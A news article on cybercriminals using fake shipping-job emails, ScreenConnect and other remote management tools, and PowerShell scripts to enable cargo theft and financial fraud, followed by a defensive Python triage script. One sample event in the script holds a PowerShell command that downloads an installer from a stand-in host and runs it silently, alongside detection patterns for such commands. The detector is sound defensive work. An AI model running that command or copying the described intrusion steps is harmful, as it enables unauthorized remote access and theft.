Researchers say cybercriminals targeted trucking and logistics firms with remote access tools, fake shipping job emails and stealthy persistence methods to support cargo theft, payment diversion and financial fraud, highlighting a growing link between digital intrusions and organized freight crime.

Researchers Warn, Logistics Companies Face New Cyber Threat As Cargo Theft Grows

The420 Web Desk

Cybercriminals targeting trucking and logistics companies are increasingly linking digital intrusions to real-world cargo theft and payment diversion, with researchers describing a coordinated pattern of remote access campaigns tied to organized crime and growing financial losses.

The activity points to a wider rise in cyber-enabled freight theft, in which attackers infiltrate logistics operations, hijack cargo bids and steal goods. Losses in North America are described as reaching $6.6 billion in 2025, underscoring how cyberattacks are being used to disrupt supply chains and generate profit.

Remote Access Campaigns Target Freight Operations

Researchers said the attackers targeted transportation organizations and, in one observed case in late February 2026, executed a malicious payload inside a controlled decoy environment run by Deception.pro partners. The compromised environment remained exposed for more than a month, offering visibility into post-compromise activity, tooling and decision-making.

The findings build on earlier reporting from November 2025 that cybercriminals had been targeting trucking and logistics firms with remote monitoring and management tools to steal freight. Active since June 2025, the group was described as working with organized crime to loot goods, particularly food and beverages.

On February 27, 2026, attackers were said to have breached a load board platform and sent emails to carriers advertising fake shipping jobs. The message delivered a malicious VBS file that launched a PowerShell script, installed ScreenConnect for remote access and displayed a fake agreement to disguise the intrusion.


Persistence, Evasion and Financial Reconnaissance

Once inside, the attackers focused on maintaining long-term access by installing multiple remote management tools. Over the course of a month, they deployed several ScreenConnect instances along with Pulseway and SimpleHelp, creating overlapping access points in case one tool was detected or removed.

Researchers also described a new signing-as-a-service method used to deploy a stealthier ScreenConnect instance. A PowerShell chain reportedly bypassed controls, downloaded the installer, had it re-signed with a fraudulent but valid certificate and then installed it silently. Original components were replaced with signed versions to reduce the chance of detection, bypass revoked certificates and preserve trusted remote access.

After securing stable access, the attackers moved to hands-on activity. They manually checked accounts including PayPal and used a custom tool to search for and steal cryptocurrency wallet data, sending the results to Telegram.

Cargo Theft Threat Extends Beyond Initial Breach

The intrusion showed that financially motivated attackers were not stopping at initial access. Researchers said they used more than a dozen PowerShell scripts to profile victims, collecting user data, browser history and signs of access to banking, payment, logistics and accounting platforms. The scripts also copied locked files, searched for valuable services, stored data in hidden folders and ran with SYSTEM privileges.

Browser databases were repeatedly scanned, patterns were matched and findings were sent through Telegram, sometimes using delayed tasks to avoid controls. Targets included banks, money transfer services, fleet payment systems and freight platforms, indicating a clear focus on financial fraud and cargo diversion.

The report concludes that the operation reflects a broader move by attackers toward exploiting legitimate trust mechanisms to evade detection. For transportation, logistics and freight organizations, it reinforces the need to watch for unauthorized remote management tools, suspicious PowerShell activity and unusual browser telemetry linked to access to financial platforms.
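As an added example (not from the researchers' report or the outlet), the following Python triage function applies the indicators the conclusion names to constructed process-creation events in a Sysmon-like shape: a script host launching PowerShell, PowerShell fetching an installer and running it silently, an RMM client that is not on the approved list, and more than one RMM product on one host. The RMM binary names and the approved-tool list are assumptions to be replaced with your own inventory.

```python
"""Triage constructed process-creation events (Sysmon Event ID 1 shape) for the
RMM-abuse pattern described in the article."""
import re
from collections import defaultdict

# Binary names are assumptions for the RMM products the report names; APPROVED_RMM
# is a placeholder for whatever tool a given fleet actually licenses.
RMM_IMAGES = {"screenconnect.clientservice.exe": "ScreenConnect",
              "pulseway.exe": "Pulseway", "remote access.exe": "SimpleHelp"}
APPROVED_RMM = {"Pulseway"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_RE = re.compile(r"invoke-webrequest|downloadstring|downloadfile", re.I)
SILENT_RE = re.compile(r"/quiet|/silent|/qn\b", re.I)

# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    {"host": "dispatch-01", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell -NoProfile -Command "Invoke-WebRequest http://example.invalid/agent.msi -OutFile C:\Temp\agent.msi; msiexec /i C:\Temp\agent.msi /quiet"'},
    {"host": "dispatch-01", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"},
    {"host": "dispatch-01", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Pulseway\Pulseway.exe"},
    {"host": "dispatch-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Pulseway\Pulseway.exe"},
]
def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return (host, rule, detail) findings for the four indicators above."""
    findings, rmm_by_host = [], defaultdict(set)
    for ev in events:
        host, image = ev["host"], _basename(ev["image"])
        parent, cmd = _basename(ev.get("parent_image", "")), ev.get("command_line", "")
        # VBS attachment -> PowerShell: the delivery step the article describes
        if parent in SCRIPT_HOSTS and image == "powershell.exe":
            findings.append((host, "script_host_spawned_powershell", cmd))
        # PowerShell that downloads an installer and runs it silently
        if image == "powershell.exe" and DOWNLOAD_RE.search(cmd) and SILENT_RE.search(cmd):
            findings.append((host, "powershell_download_silent_install", cmd))
        if image in RMM_IMAGES:
            tool = RMM_IMAGES[image]
            rmm_by_host[host].add(tool)
            if tool not in APPROVED_RMM:
                findings.append((host, "unapproved_rmm", tool))
    # Overlapping access points: more than one RMM product seen on a single host
    for host, tools in rmm_by_host.items():
        if len(tools) > 1:
            findings.append((host, "multiple_rmm_tools", ", ".join(sorted(tools))))
    return findings
```

On the constructed sample, dispatch-01 produces all four findings and dispatch-02, which runs only the approved tool, produces none.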
